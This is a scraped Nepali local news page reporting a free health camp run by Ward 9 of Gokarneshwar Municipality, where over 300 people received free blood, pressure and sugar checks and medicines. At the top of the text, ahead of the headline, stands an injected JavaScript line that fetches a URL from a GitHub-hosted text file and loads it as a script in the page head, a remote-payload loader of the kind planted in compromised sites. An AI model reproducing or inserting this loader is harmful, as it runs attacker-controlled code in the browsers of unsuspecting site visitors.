;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वर नपा वडा नं ९ द्वारा निशुल्क स्वास्थ्य शिविर – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गोकर्णेश्वर नपा वडा नं ९ द्वारा निशुल्क स्वास्थ्य शिविर
गोकर्नेश्वोर बिशेष

गोकर्णेश्वर नपा वडा नं ९ द्वारा निशुल्क स्वास्थ्य शिविर

माघ १४,

काठमाडौं । गोकर्णेश्वर नगरपालिका वडा नं ९ ले स्थानीय व्यक्तिहरूलाई लक्षित गरी निशुल्क स्वास्थ्य शिविर सम्पन्न गरेको छ। वडा अध्यक्ष राजीव थापा ज्यूको नेतृत्वमा संचालित सो कार्यक्रममा ३०० भन्दा बढीले सेवा लिएका थिए । शिविरमा निशुल्क रगत जाँच, प्रेसर जाँच, सुगर जाँच साथै निशुल्क औषधि समेत वितरण गरिएको थियो।

कार्यक्रमको अ्यक्षता वडा सदस्य सत्यभमा श्रेष्ठ ज्यूले गर्नु भएको थियो भने प्रमुख अतिथिको रुपमा नगरपालिकाका प्रमुख कार्यकारी अधिकृत रहेका थिए। साथै नगरपालिकाका स्वास्थ्य विभागका प्रमुख को समेत उपस्थिति रहेको थियो।

शिविरमा वडा कार्यालय भवनमै भएको थियो ।

 

फेसबुक प्रतिक्रियाहरु